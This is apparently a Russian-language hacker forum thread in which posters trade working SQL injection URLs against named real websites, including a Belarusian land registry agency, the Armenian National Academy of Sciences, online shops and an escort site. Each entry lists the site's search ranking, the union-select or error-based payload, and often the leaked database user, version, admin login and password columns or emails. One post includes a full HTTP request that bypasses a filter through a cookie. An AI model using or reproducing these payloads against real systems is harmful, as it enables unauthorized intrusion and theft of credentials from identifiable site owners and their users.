SQL Инъекции

Code:

http://www.murmancity.com/news/sel_news_from_id.php?id=8128+or+1+group+by+concat('xaker',floor(rand(0)*2))+having+min(0)+or+1+--+

 

для любителей NY
PR 5

PHP:

http://www.creativecoreny.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat%28username,0x3a,password%29chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--

 

Сайт Брестского агентства по государственной регистрации и земельному кадастру.

ТИЦ = 20
PR = 3

Code:

http://agr.brest.by/agencies/?id=-3'+union+all+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12+--+

 

тИЦ 425

Code:

http://promlitie.ru/index.php?r=9&vmonth=2012-03&nid=99999999999+UnIon+selECt+1,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,3+--+

promlit6_user@localhostromlit6_data:5.0.92-log

 

Мега - Боян, который валяется в гугле около года
Так что скуля не в зачет!

 

m-game.com.ua

Code:

http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+''='select' true //вырезается select
http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+''='selselectect' false //но не рекурсивно!
http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+'test'='(test)' true //вырезаются скобки
http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+--+а false //так как комментирование не работает, и под фильтр не попадает, можно сразу сказать что условие заключено в скобки.

В общем - выхода нет. Но как оказалось - руки кодерам лучше было бы оборвать. Под фильтр попадают только массивы _GET и _POST, а массив _COOKIE не проверяется.

Code:

GET /?podr=compare&patch=catalog HTTP/1.1
Host: m-game.com.ua
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: version_ids=298) union select 1,user(),version(),4,5,6,7-- f; 

Code:

user:mgame@localhost version:5.0.77

 

Code:

http://www.gipsstyle.ru/price.php?cat_id=3+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+

 

Оффициальный сайт группы "Старый приятель".

ТИЦ = 30
PR = 2

PHP:

http://www.star-priyatel.ru/events.php?mode=show&id=9999999+union+select+1,2,3,concat_ws(0x3a,f_id,f_login,f_password),4,5+from+t_admins+limit+1,1--

 

http://www.game-leshiy.ru/porno_games.php?id=-10'+union+select+1,2,3,4,5,6,7,8,9,10+--+

 

ТиЦ 550, PR 4, ЯК, DMOZ, YI 75k, GI 107k

http://www.globalomsk.ru/directory/index.php?category=1 UNION SELECT NULL,NULL,CONCAT_WS(0x3a,user(),version(),database()),NULL,NULL#​

 

Code:

]http://www.bodyshape.co.th/inthemedia.php?cat=[COLOR=Red][B]-[/B][/COLOR]1[COLOR=Red][B]+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--+[/B][/COLOR]

version: 5.0.51a
database: bodyshape_db
user: bodyshape_admin@localhost

Code:

http://www.mazda.autoland-mgn.ru/index.php?id=[COLOR=Red][B]-[/B][/COLOR]18[COLOR=Red][B]+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--+[/B][/COLOR]

version: 5.0.41-log
database: mgnauto_bs
user: [email protected]

 

Облицовочная плитка никому не нужна?

ТИЦ = 210
PR = 3

Яндекс Каталог = Y
DMOZ.org = Y

PHP:

http://www.akvabeton.ru/catalog.php?menu=ncat&part=9999999'+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9+--+

Вывод в сорце:

PHP:

geeload_akvabeto@localhost:geeload_akvabeto:4.1.13

 

Эскорт:

Code:

http://www.escortscitytours.com/index.php?escortid=-320'+union(select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema./**/columns+where+table_name+like+'members'+limit+1,1)--+f

 

/mnt/cluster/data/

 

Поднимаем уровень рождаемости

PHP:

http://donor-spermi.ru/contact.php?id=1+union+select+1,concat_ws(0x3a,user,pass),3,4,5,6,7,8,9+from+userlist--

Вывод в <title>, админка http://donor-spermi.ru/admin/

 

Национальная академия наук Республики Армения
тИЦ 500 PR 7

Code:

http://www.sci.am/viewnews.php?t=0&langid=1&nid=-1%27+UnIon+selECt+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

scinew@localhost:scinew_unicode:5.1.61-0ubuntu0.11.10.1

Code:

http://www.sci.am/viewnews.php?t=0&langid=1&nid=-1%27+UnIon+selECt+1,2,group_concat%28email%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+inst+--+

Пароли от админки и почты скорее всего в другой базе...

 

soldat1945@localhost:BelMusic

[email protected]

 

!!!!!!!!!!!!!!!

Интернет Магазин
Яндекс тИЦ (CY) 550
Alexa Rank 1,152,314 +454,752
Google PageRank (PR) 4
от лайфа=)

 

Круто, только баян.

 

minsoc.ru ТИЦ-450 PR-5 минералоголики

Code:

http://www.minsoc.ru/memberslist.php?uid=3035-999.9+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,concat_ws(0x3a,version(),user(),database()),86,87,88,89,90,91,92,93,94,95,96+--+

Code:

5.0.26-log:minsocru@localhost:minsocru

real-business.ru ТИЦ-160

Code:

http://www.real-business.ru/subpage.php?news=-1524+union+select+concat_ws(0x3a,version(),user(),database()),2+--+

*в тайтле

Code:

5.0.70-log:[email protected]:gb_realbiz

economics.kiev.ua ТИЦ-210

Code:

http://www.economics.kiev.ua/index.php?id=-938'+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,0,11,12+--+&view=article

Code:

5.1.49-3:c101@localhost:c101